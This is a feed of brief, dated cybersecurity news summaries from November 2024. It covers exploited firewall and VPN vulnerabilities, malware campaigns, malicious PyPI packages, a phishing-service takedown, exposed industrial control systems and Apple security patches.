November 22, 2024 at 04:31PM Attackers exploited two recently patched vulnerabilities in Palo Alto Networks firewalls, compromising around 2,000 devices initially but down to 800 later. They deployed backdoors, malware, and cryptocurrency miners. The vulnerabilities enabled remote code execution, and the vendor continues to reference only a “limited number” of affected systems. ### Meeting Takeaways: … Read more
November 22, 2024 at 12:39PM In June 2017, A.P. Møller – Maersk suffered a severe software attack, attributed to the NotPetya malware from a Ukraine-Russia conflict, causing $10 billion in damages. CISA’s recent Secure by Demand guidance urges buyers to ensure software safety through independent validation and comprehensive analysis, beyond just questionnaires and SBOMs. ### … Read more
November 22, 2024 at 12:17PM The Mysterious Elephant threat actor, also known as APT-K-47, is using advanced malware called Asynshell in recent attacks, targeting Pakistani entities. Utilizing Hajj-themed lures, they employ phishing tactics to deliver malicious files. The group has improved their methods and tools, showcasing a focus on evolving their malware since 2023. **Meeting … Read more
November 22, 2024 at 01:58AM Researchers found two malicious packages on PyPI, impersonating AI models to deploy the JarkaStealer malware. Uploaded in November 2023, the packages had 1,748 and 1,826 downloads, respectively. They revealed risks of supply chain attacks, emphasizing caution when using open-source components in development. The packages are now unavailable for download. ### … Read more
November 21, 2024 at 12:08PM Microsoft and the Justice Department seized over 240 domains linked to ONNX, a phishing-as-a-service platform targeting thousands of victims globally since 2017. ONNX was the leading provider of phishing kits in 2024, enabling sophisticated attacks that bypassed security measures. Operations ceased after the owner’s identity was revealed. ### Meeting Takeaways … Read more
November 21, 2024 at 06:11AM New research reveals over 145,000 internet-exposed Industrial Control Systems (ICS) in 175 countries, with the U.S. having the highest exposure. Key protocols used are outdated, increasing vulnerability. Cyber attacks targeting ICS are rare but rising, necessitating enhanced security measures. The analysis underscores the importance of monitoring and securing critical infrastructure. … Read more
November 20, 2024 at 09:39AM The cybercriminal group “Water Barghest” exploits vulnerabilities in IoT devices to create proxy botnets, already compromising over 20,000 devices. Using automated scripts and proprietary malware, they sell these devices on a residential proxy marketplace. This poses significant security challenges, prompting the need for enhanced IoT protection measures. **Meeting Takeaways:** 1. … Read more
November 19, 2024 at 06:11PM Chinese government-affiliated hackers are exploiting a zero-day vulnerability in Fortinet’s Windows VPN client to steal sensitive information, including credentials. Volexity identified the issue and reported it to Fortinet, which has yet to release a fix. The attackers use a tool called DeepData, capable of extensive data theft. ### Meeting Takeaways … Read more
November 19, 2024 at 01:54PM Apple released updates on November 19, 2024, addressing CVE-2024-44308 and CVE-2024-44309, which involved vulnerabilities that could lead to arbitrary code execution and cross-site scripting attacks, respectively. The issues were reported to have been actively exploited on Intel-based Macs and affect iOS and iPadOS 18.1.1 devices. ### Meeting Takeaways **Release Information:** … Read more
November 19, 2024 at 01:54PM Two vulnerabilities (CVE-2024-44308 and CVE-2024-44309) in iOS 17.7.2 and iPadOS 17.7.2 could allow arbitrary code execution and cross-site scripting attacks, respectively, on Intel-based Macs. Updates are available for various iPhone and iPad models starting from iPhone XS and iPad Air 3rd generation onward. ### Meeting Takeaways **Release Information:** – **Release … Read more